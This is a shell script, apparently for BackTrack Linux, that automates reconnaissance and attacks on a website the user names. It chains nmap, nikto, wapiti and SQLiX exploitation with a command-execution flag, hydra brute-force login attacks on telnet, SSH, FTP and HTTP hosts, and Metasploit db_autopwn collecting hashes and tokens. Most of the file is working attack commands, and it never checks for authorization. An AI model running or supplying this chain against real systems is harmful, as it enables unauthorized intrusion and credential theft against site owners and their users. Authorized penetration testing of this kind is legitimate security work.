#!/bin/sh
#
# Script to automate pen testing
# must be run from the ROOT home


######################################################
echo "!!!!! MUST be run from the ROOT home !!!!!"

echo "Use Only Default BackTrack Applications (y or n)"
read BTONLY

echo "Does the site use SSL (https) y or n"
read isssl

echo "Enter site name to be scanned eg. yahoo.com"
read network
echo "Site to be scanned : $network"
echo "Site to be scanned : $network" >> status.txt


## creates the directory where all results wil be saved
name=`eval date +%H%M%S-%d%h%Y`
echo "files will be saved in the directory named : $name"

## makes the directory
mkdir $name
######################################################

######################################################
## root URL 
RootURL=${network%%/*} 
echo "Root URL = $RootURL"
######################################################

######################################################
## run Nslookup 
echo "NsLookup the NAME begin"
IPAddress=`nslookup $RootURL|grep "Address: "|cut -d" " -f2 ` 
echo "Ip address = $IPAddress"
echo "Ip address = $IPAddress" >> status.txt

######################################################

######################################################
echo "Active Scanning Started" > status.txt
echo "Active Scanning Started"
echo "####  Check status.txt for status ####"
######################################################

######################################################
## begin the Network Scan section
######################################################
######################################################
######################################################

######################################################
## run FIERCE 
if [ "$BTONLY" == "n" ] ; then
echo "FIERCE DNS SCAN begin"
echo "FIERCE DNS SCAN begin" >> status.txt
	echo "Fierce DNS SCAN begin"
	cd /root/tools/fierce2
	fierce -dns $RootURL -wide -output /root/$name/Fierce_Output.txt
fi
######################################################

######################################################
## run NMAP
echo "NMAP SCAN begin"
echo "NMAP SCAN begin" >> status.txt

nmap -vv -PN -sV --script=robots.txt,html-title --version-intensity 0 -O --osscan-limit -oM /root/$name/NmapOutput.txt -oX /root/$name/NmapOutput.xml $IPAddress/32 >/root/$name/NmapRunTimeOutput.txt

echo ""
grep "open port" /root/$name/NmapRunTimeOutput.txt  

echo ""
######################################################

######################################################
##Start AMAP to better identify the service that are running and their versions--also grab banners
echo "AMAP begin"
echo "AMAP begin" >> status.txt
echo " " >> status.txt
echo "Service Identification Started" >> status.txt
#amap -W 
amap -A -bqv -i $name/NmapOutput.txt -o $name/AmapOutput.txt
######################################################

######################################################
#create the NESSUS input file

if [ "$BTONLY" == "n" ] ; then

	echo "NESSUS begin"
	echo "NESSUS begin" >> status.txt
	grep Host $name/NmapOutput.txt | grep /open/ | cut -d ' ' -f 2 | paste -d ',' -s > $name/NESSUS_INPUT1.txt
	sort $name/NESSUS_INPUT1.txt| uniq > $name/NESSUS_INPUT.txt
	rm $name/NESSUS_INPUT1.txt
	##run NESSUS
	#/opt/nessus/sbin/nessus-update-plugins

	#/opt/nessus/bin/nessus -q localhost 1241 username password /root/$name/NESSUS_INPUT.txt /root/$name/NessusOutput.nbe -x

	#/opt/nessus/bin/nessus -i /root/$name/NessusOutput.nbe -o /root/$name/NessusOutput.html
fi

#####################################################

echo " "
echo "Web Server Scanning Started" >> status.txt
echo "  "


######################################################
#Start HttPrint to fingerprint the web server

echo " " >> status.txt
echo "HttPrint BEGIN"
echo "HttPrint BEGIN" >> status.txt
cd /pentest/enumeration/www/httprint/linux

./httprint -x /root/$name/NmapOutput.xml -s signatures.txt -P0 -o /root/$name/HttPrint_output.html

cd /root
######################################################


######################################################
##Start SSlScan of the webservers
if [ "$isssl" == "y" ] ; then
	echo "SSL Scan begin"
	echo "SSL Scan begin" >> status.txt 
	echo "sslscan $RootURL --xml=/root/$name/SSLScanOutput.txt"
	sslscan $RootURL >> /root/$name/SSLScanOutput.txt
fi
######################################################


######################################################
#Start Wafw00f to scan for WAFs

echo " " >> status.txt
echo "Wafw00f BEGIN"
echo "Wafw00f BEGIN" >> status.txt
cd /root/tools/wafw00f/

if [ "$isssl" = "y" ] ; then
	##Wafw00f for SSL webservers
	echo "Wafw00f Output"> /root/$name/Wafw00f_HTTPS_output.txt
        echo "host = $network"
        ./wafw00f.py https://$RootURL >>/root/$name/Wafw00f_HTTPS_output.txt

else
	##Wafw00f for non-SSL webservers
	echo "Wafw00f Output"> /root/$name/Wafw00f_HTTP_output.txt
        echo "host = $network"
        ./wafw00f.py http://$RootURL >>/root/$name/Wafw00f_HTTP_output.txt
fi
######################################################


######################################################
#Start hostmap to identify all web hosts on an IP
##
echo "HostMap BEGIN"
echo "HostMap BEGIN" >> status.txt
cd /root/tools/hostmap-0.2.1/
if [ "$isssl" = "y" ] ; then
        ruby hostmap.rb -t $IPAddress > /root/$name/HOST_MAP_SSL_output.txt

else
        ruby hostmap.rb -t $IPAddress > /root/$name/HOST_MAP_NONSSL_output.txt

fi
######################################################

######################################################
#Start Wapati
##
echo "Wapiti BEGIN"
echo "Wapiti BEGIN" >> status.txt

if [ "$isssl" = "y" ] ; then
        wapiti https://$RootURL -v3 > /root/$name/Wapiti_SSL_output.txt
        echo "wapiti https://$RootURL -v3 > /root/$name/Wapiti_SSL_output.txt"

else
        wapiti http://$RootURL -v3 > /root/$name/Wapiti_NON_SSL_output.txt
	echo "wapiti http://$RootURL -v3 > /root/$name/Wapiti_NON_SSL_output.txt"
fi

######################################################
#Start SkipFish to scan 

if [ "$BTONLY" == "n" ] ; then
	echo " " >> status.txt
	echo "Scanning with SkipFish" >> status.txt
	echo "SkipFish BEGIN"
	echo "SkipFish BEGIN" >> status.txt
	#cd /root/tools/skipfish/

	#if [ "$isssl" = "y" ] ; then
	#	echo "Running SkipFish against https://$RootURL" 
	#	./skipfish -o /root/$name/SkipFish_Output.txt https://$RootURL&
	#else
	#	echo "Running SkipFish against http://$RootURL" 
	#	./skipfish -o /root/$name/SkipFish_Output.txt http://$RootURL&
	#fi

	#cd /root

fi
######################################################


######################################################
#Start SQLiX to scan for SQL vulnerabilites

echo " " >> status.txt
echo "Scanning for SQL vulnerabilites" >> status.txt
echo "SQLiX BEGIN"
echo "SQLiX BEGIN" >> status.txt
cd /pentest/database/SQLiX/
echo "SQLiX Output"> /root/$name/SQLiX_output.txt
if [ "$isssl" = "y" ] ; then
	echo "Running SQLix against https://$network" 
	./SQLiX.pl -crawl=https://$RootURL -all -v=5 -exploit -cmd="netstat -an">> /root/$name/SQLiX_output.txt&
else
	echo "Running SQLix against http://$network" 
	./SQLiX.pl -crawl=http://$RootURL -all -v=5 -exploit -cmd="netstat -an">> /root/$name/SQLiX_output.txt&
fi

cd /root
######################################################


######################################################
##Start the NIKTO web server scanner

echo " " 
echo "Scanning for Web Server vulnerabilites" >> status.txt
echo "NIKTO begin"
echo "NIKTO begin" >> status.txt

cd /pentest/scanners/
svn checkout http://svn2.assembla.com/svn/Nikto_2

cd /pentest/scanners/Nikto_2/nikto-2.1.1
./nikto.pl -update

if [ "$isssl" = "y" ] ; then
	./nikto.pl -host https://$network -output /root/$name/NiktoOutput.html -Format HTM 
else	
	./nikto.pl -host http://$network -output /root/$name/NiktoOutput.html -Format HTM 
fi

cd /root
######################################################


######################################################
##Start the hoppy web server scanner
if [ "$BTONLY" == "n" ] ; then
	echo " "
	echo "Hoppy Scan begin"
	echo "Hoppy Scan begin" >> status.txt

	cd /root/tools/hoppy-1.7.3

	if [ "$isssl" = "y" ] ; then
		./hoppy -h https://$RootURL -S /root/$name/Hoppy_SSL_output_$LINE.txt
	else
		./hoppy -h http://$RooURL -S /root/$name/Hoppy_non-SSL_output_$LINE.txt
	fi

	cd /root
fi
######################################################

######################################################
#Start Cewl to scan the site and create a dict file for hydra
if [ "$BTONLY" == "n" ] ; then
	echo " " >> status.txt
	echo "Scanning for Dictfile words" >> status.txt
	echo "CewL BEGIN"
	echo "CewL BEGIN" >> status.txt
fi
######################################################


######################################################
## grep the AMAP output looking for a web server that have basic authentication emabled
grep '401' $name/AmapOutput.txt | cut -d' ' -f 3|grep 80|cut -d'/' -f1|uniq|cut -d':' -f1 > $name/WebServersLoginsHTTP1.txt
HTTPcount=`grep '401' $name/AmapOutput.txt | cut -d' ' -f 3|grep 80|cut -d'/' -f1|uniq|cut -d':' -f1 |wc -l`
grep '401' $name/AmapOutput.txt | cut -d' ' -f 3|grep 443|cut -d'/' -f1|uniq|cut -d':' -f1 > $name/WebServersLoginsHTTPS1.txt
HTTPScount=`grep '401' $name/AmapOutput.txt | cut -d' ' -f 3|grep 443|cut -d'/' -f1|uniq|cut -d':' -f1 | wc -l`
######################################################


echo "*****************************************************************************"

echo "   "
echo " " >> status.txt
echo "Active Scanning DONE" >> status.txt
echo "  " >> status.txt


######################################################
## begin the attack section

echo "DO YOU WANT TO BEGIN ATTACKS y/n"
read attacks

if [ "$attacks" = "y" ] ; then 
echo "Vulnerability Testing Started " >> status.txt
echo " " >> status.txt
######################################################

######################################################
echo "DO YOU WANT TO BEGIN Brute force Password ATTACKS y/n"
read bfattacks
if [ "$bfattacks" == "y" ] ; then

###begin HYDRA brute force logins
echo "Beginning BruteForce Password Attacks" >> status.txt
echo "Hydra Begins"
echo "Hydra Begins" >> status.txt

if [ "$TELcount" != "0" ] ; then
        echo "Attacking Telnet Hosts" >> status.txt
        echo "Running Hydra against TELNET HOSTS"
        exec 10</root/$name/TelnetHosts.txt
        let count=0
        while read LINE <&10; do
                echo "host = $LINE"
                ip=${LINE%%:*}
                port=${LINE#*:}
                hydra -L /root/script/SHORTusername.file -P /root/script/SHORTpassword.file
 -e ns -s $port -t 4 -o $name/hydra_TELNET_$ip.out $ip telnet
                ((count++))
                done
                exec 10>&-
        ###
        echo "*****************************************************************************
"
        echo "   "
fi

if [ "$SSHcount" != "0" ] ; then
        ##
        echo "Attacking SSH Hosts" >> status.txt
        echo "Running Hydra against SSH HOSTS"

        exec 10</root/$name/SSHHosts.txt
        let count=0
        while read LINE <&10; do
                echo "host = $LINE"
                ip=${LINE%%:*}
                port=${LINE#*:}
                hydra -L /root/scripts/SHORTusername.file -P /root/scripts/SHORTpassword.fi
le -s $port -e ns -o $name/hydra_SSH_$ip.out $ip ssh2
                ((count++))
                done
                exec 10>&-
        ###
   echo "*****************************************************************************"
        echo "   "
fi

if [ "$FTPcount" != "0" ] ; then
        echo "Attacking FTP Hosts" >> status.txt
        echo "Running Hydra against FTP HOSTS"


        exec 10</root/$name/FTPHosts.txt
        let count=0
        while read LINE <&10; do
                echo "host = $LINE"
                ip=${LINE%%:*}
                port=${LINE#*:}
                hydra -L /root/scripts/SHORTusername.file -P /root/scripts/SHORTpassword.file -s $port -e ns -o $name/hydra_FTP_$ip.out $ip ftp
                ((count++))
                done
                exec 10>&-
        ###
        echo "*****************************************************************************"
        echo "   "
fi

if [ "$HTTPcount" != "0" ] ; then
        echo "Attacking HTTP Hosts" >> status.txt
        echo "Running Hydra against HTTP HOSTS"
        hydra -L SHORTusername.file -P SHORTpassword.file -e ns -o $name/hydra.out -M $name/WebServersLoginsHTTP.txt http-get /
        echo "*****************************************************************************"
        echo "   "
fi

if [ "$HTTPScount" != "0" ] ; then
        echo "Attacking HTTPS Hosts" >> status.txt
        echo "Running Hydra against HTTPS HOSTS"
        hydra -L SHORTusername.file -P SHORTpassword.file -e ns -o $name/hydra.out -M $name/WebServersLoginsHTTPS.txt https-get /
        echo "*****************************************************************************"
        echo "   "
fi
echo "BruteForce Password Attacks DONE" >> status.txt
fi #end hydra attacks
######################################################



######################################################
## break out of the script and start the metasploit framework
echo "DO YOU WANT TO BEGIN metasploit ATTACKS y/n"
read msattacks
if [ "$msattacks" = "y" ] ; then

echo "DO YOU WANT TO update the metasploit framework y/n"
read msupdate
if [ "$msupdate" = "y" ] ; then
echo "Update Metasploit framework"
cd /pentest/exploits/framework3
./svn-update.sh

fi #end metasploit update

echo "********************************************************************"
echo " " >> status.txt
echo "Beginning Active Vulnerabiltiy Exploitation" >> status.txt
echo "                          NOW RUNNING METASPLOIT"


######################################################
#RUN Metasploit

cd /root/$name

echo "db_create testing.db" > MetaSploitInput.txt
echo "load db_credcollect" >> MetaSploitInput.txt
echo "db_import_nmap_xml /root/$name/NmapOutput.xml" >> MetaSploitInput.txt
echo "db_import_nessus_nbe /root/$name/NessusOutput.nbe" >> MetaSploitInput.txt
echo "db_autopwn -e -p" >> MetaSploitInput.txt
echo "db_hosts" >> MetaSploitInput.txt
echo "db_services" >> MetaSploitInput.txt
echo "sessions -L" >> MetaSploitInput.txt
echo "db_hashes" >> MetaSploitInput.txt
echo "db_tokens" >> MetaSploitInput.txt
echo "db_vulns" >> MetaSploitInput.txt
echo "db_notes" >> MetaSploitInput.txt
echo "quit" >> MetaSploitInput.txt

## Begin the automated attack with the metasploit framework
cd /root
/pentest/exploits/framework3/msfconsole -r $name/MetaSploitInput.txt >> $name/MetaSploitOutput.txt

echo "Active Vulnerabiltiy Exploitation DONE" >> status.txt
########################################################


fi #end metasploit


echo "files will be saved in the directory named : $name"
echo "files will be saved in the directory named : $name" >> status.txt

fi #end attack section

echo "DONE" >> status.txt
